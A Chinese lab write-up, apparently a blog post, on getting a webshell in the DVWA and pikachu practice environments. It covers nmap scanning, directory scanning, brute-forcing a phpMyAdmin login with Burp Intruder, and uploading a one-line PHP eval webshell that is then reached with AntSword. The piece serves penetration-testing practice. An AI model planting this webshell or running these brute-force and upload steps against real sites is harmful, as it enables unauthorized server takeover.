从DVWA和pikachu上获得getshell

从DVWA和pikachu上获得getshell

nmap扫描

nmap -sV -O -A -T4 192.168.1.9 

可以看到扫描结果中有3个端口是打开的,分别为22、25、80端口,并且可以看到目标主机用的是Linux系统

image-20211224094719057

用御剑后台进行扫描

目标靶机地址

192.168.1.9

扫描结果如下:

image-20211224093215337

进入登录界面

http://192.168.1.9/phpmyadmin/db_create.php

image-20211224093414409

对账户密码进行暴力破解

打开burp suite对网页信息进行拦截

image-20211224093634184

拦截到的账户密码信息

image-20211224093703658

进入Intruder后,对【有效载荷集】进行设置后,进行暴力破解

image-20211224093909183

暴力破解结果如下:

得到账户和密码

账户:root
密码:123456

image-20211224100209247

方法1 从DVWA上获得getshell进行渗透

登录phpMyAdmin

进入靶场界面

http://192.168.1.9/index.html

image-20211225131354372

登录DVWA界面

image-20211225131810350

原本的账户密码:

账户:admin
密码:password

由于开始登录上面显示的账户密码未成功登录进去

所以我在phpMyAdmin查看DVWA数据库中的账户和密码

账户:admin
密码:7890
MD5码:cdaeb1282d614772beb1e74c192bebda

image-20211224111201720

image-20211224123811907

修改权限为low

image-20211224124912120

上传一句话木马

<?php @eval($_POST["xxb"]);?>

木马文件名为xxb.php

image-20211224131438934

用蚁剑进行连接

http://192.168.1.9/01/hackable/uploads/xxb.php

image-20211224131310552

连接成功后进入界面

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值